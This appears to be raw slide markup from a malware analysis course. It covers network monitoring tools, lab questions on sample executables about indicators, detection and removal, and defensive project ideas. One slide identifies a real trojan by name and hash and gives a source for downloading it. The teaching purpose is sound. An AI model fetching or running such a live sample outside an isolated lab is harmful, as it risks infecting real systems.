                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>A set of instructions that run on your computer and make your system do something that an attacker wants it to do.</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Network Monitoring</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349"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Netcat</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Monitoring common ports used by malwares (80, 443, …)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="350" name="Google Shape;610;p60" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="249120" y="3357000"/>
            <a:ext cx="8867520" cy="172368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Network Monitoring</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352"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INetSim (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>www.inetsim.org</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>): Linux-based </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>app</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="353" name="Google Shape;618;p61" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979640" y="1989000"/>
            <a:ext cx="5786640" cy="4090320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>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Network Monitoring</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355"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Wireshark</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="356" name="Google Shape;625;p62" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043640" y="1772640"/>
            <a:ext cx="7173360" cy="508500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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143640" cy="1124280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="fbd4b4"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="69000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Practice 3 [Surface &amp; Dynamic Analysis]</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="358" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr lvl="1" marL="457200" indent="-456840">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>PE File</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Lab03-01.exe, </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Questions</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>What are the malware’s imports and strings? </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>What are the malware’s host-based indicators</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Are there any useful network-based signatures for this malware? If so, what are they?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>How to detect and remove the malware?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Project idea</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Write a simple program to </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Detect the malware</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Remove the malware off the infected PC</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-107640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143640" cy="1124280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="fbd4b4"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="69000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Practice 4 [Surface &amp; Dynamic Analysis]</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="360" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>PE file</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: Lab03-02.dll</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="556"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Questions</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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Import &amp; Export?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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How can you get this malware to install itself?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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How would you get this malware to run after installation?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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How can you find the process under which this malware is running?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Which filters could you set in order to use procmon to glean information?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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What are the malware’s host-based indicators?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Are there any useful network-based signatures for this malware?</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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143640" cy="1124280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="fbd4b4"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="69000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Practice 4 [Surface &amp; Dynamic Analysis]</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="362" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>PE file</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: Lab03-03.exe</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="556"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Questions</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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What happening when this malware executes (monitoring by Process Explorer)?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Identify any live memory modification?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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What are the malware’s host-based indicators?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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What is the goal of this malware?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="556"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Project idea</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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Write a simple program to </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Detect the malware</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Remove the malware off the infected PC</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-120960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="519"/>
              </a:spcBef>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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143640" cy="1124280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="fbd4b4"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="69000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Practice 4 [Surface &amp; Dynamic Analysis]</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="364"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Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>PE file</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: Lab03-04.exe</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Questions</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What happens when you run this file?</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What is causing the roadblock in dynamic analysis?</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Are there other ways to run this program?</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Practice [A real virus]</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="366"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A real virus: Trojan.Win32.Mooze</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Download from </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>virusshare.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> </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SHA256</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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855e3aa2a4b8432f5a2b77a6aa2635ae8382ca6df76b4c0d7405856faa7b5b5b</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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MD5</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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efc05e673dc516a6a96bc346dc7c93a6 </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Project idea</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368"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Write a simple program for monitoring processes running in Windows</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Write a simple signature and/or behaviour-based malware detection and removal program</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Collect &amp; store the malware signatures &amp; behaviours</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Options: </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Quick scan: signature-based scan</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Full scan: behaviour-based scan</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
